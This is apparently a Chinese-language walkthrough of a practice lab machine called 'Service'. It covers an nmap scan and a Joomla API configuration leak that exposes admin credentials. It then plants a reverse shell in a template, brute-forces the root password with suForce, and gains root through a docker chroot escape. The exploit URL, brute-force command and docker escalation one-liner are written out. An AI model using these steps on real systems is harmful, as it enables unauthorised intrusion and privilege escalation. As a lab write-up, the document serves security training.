# 靶场搭建
下载:Service
Nat,IP: 192.168.1.130
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http nginx 1.22.1 | |
|_http-title: Welcome to nginx! | |
|_http-server-header: nginx/1.22.1 | |
8080/tcp open http Apache httpd 2.4.54 ((Debian)) | |
| http-robots.txt: 16 disallowed entries (15 shown) | |
| /joomla/administrator/ /administrator/ /api/ /bin/ | |
| /cache/ /cli/ /components/ /includes/ /installation/ | |
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/ | |
|_http-server-header: Apache/2.4.54 (Debian) | |
|_http-title: Welcome to nginx! | |
|_http-open-proxy: Proxy might be redirecting requests |
明显的 joomla,登录口: http://192.168.1.130:8080/administrator/
搜搜 joomla 漏洞发现漏洞:exploit-db
访问 http://192.168.1.130:8080/api/index.php/v1/config/application?public=true
拿到账号密码: admin/j00mL@123###
进入后直接找到 system 下的 Templates,进去修改 index.php 的模板,写入反弹 shell
监听,访问,拿到 shell。
# 提权
上传 suForce 和字典去枚举
www-data@640aa6d0dea4:/var/www/html$ ./suforce -u root -w techyou.txt | |
_____ | |
___ _ _ | ___|__ _ __ ___ ___ | |
/ __| | | || |_ / _ \| '__/ __/ _ \ | |
\__ \ |_| || _| (_) | | | (_| __/ | |
|___/\__,_||_| \___/|_| \___\___| | |
-=================================- | |
[*] Username: root | |
[*] Wordlist: techyou.txt | |
[i] Status: | |
366/20000/1%/fucker | |
[+] Password: fucker Line: 366 | |
-=================================- |
su 过去,进入 root 目录下发现 .joel_key
这个私钥,ssh 到 joel 账号上,查看带有 S 标志的文件: find / -perm -4000 2>/dev/null
发现 docker 有,那么直接提权
joel@service:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh | |
# id | |
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo) |